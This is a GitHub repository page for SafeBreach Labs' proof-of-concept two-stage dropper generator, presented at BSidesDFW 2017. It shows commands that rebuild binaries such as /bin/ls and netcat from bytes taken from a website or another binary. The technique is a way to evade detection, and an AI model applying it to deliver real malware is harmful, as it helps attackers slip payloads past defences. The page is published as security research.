Skip to content
/ mkmalwarefrom Public

Proof-of-concept two-stage dropper generator that uses bits from external sources

License

BSD-3-Clause license
97 stars 21 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

SafeBreach-Labs/mkmalwarefrom

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
bsidesdfw_wiki_example.py
bsidesdfw_wiki_example.py
 
 
mkmalwarefrom.py
mkmalwarefrom.py
 
 

Repository files navigation

mkmalwarefrom

mkmalwarefrom is a proof-of-concept two-stage dropper generator. It was released as part of the Malwares From Thin Bits talk given at BSidesDFW 2017 conference by Itzik Kotler from SafeBreach Labs.

Slides are availble here

Version

0.1.0

Installation

mkmalwarefrom requires Python and was tested with Python 2.7.13.

$ git clone https://github.com/SafeBreach-Labs/mkmalwarefrom.git
$ cd mkmalwarefrom
$ python mkmalwarefrom.py -h

Example: Generating /bin/ls from Yahoo

# assume mkmalwarefrom root directory
$ cat /bin/ls | ./mkmalwarefrom.py -1 http://www.yahoo.com > download_ls.py
$ python download_ls.py > ls2 
$ md5 /bin/ls ls2

Example: Generating /usr/bin/nc from /usr/bin/ssh

# assume mkmalwarefrom root directory
$ cat /usr/bin/nc | ./mkmalwarefrom.py -2 /usr/bin/ssh > mk_nc.py
$ python mk_nc.py > nc2
$ md5 /usr/bin/nc nc2

License

BSD 3-Clause

About

Proof-of-concept two-stage dropper generator that uses bits from external sources

Resources

Readme

License

BSD-3-Clause license
Activity
Custom properties

Stars

97 stars

Watchers

7 watching

Forks

21 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages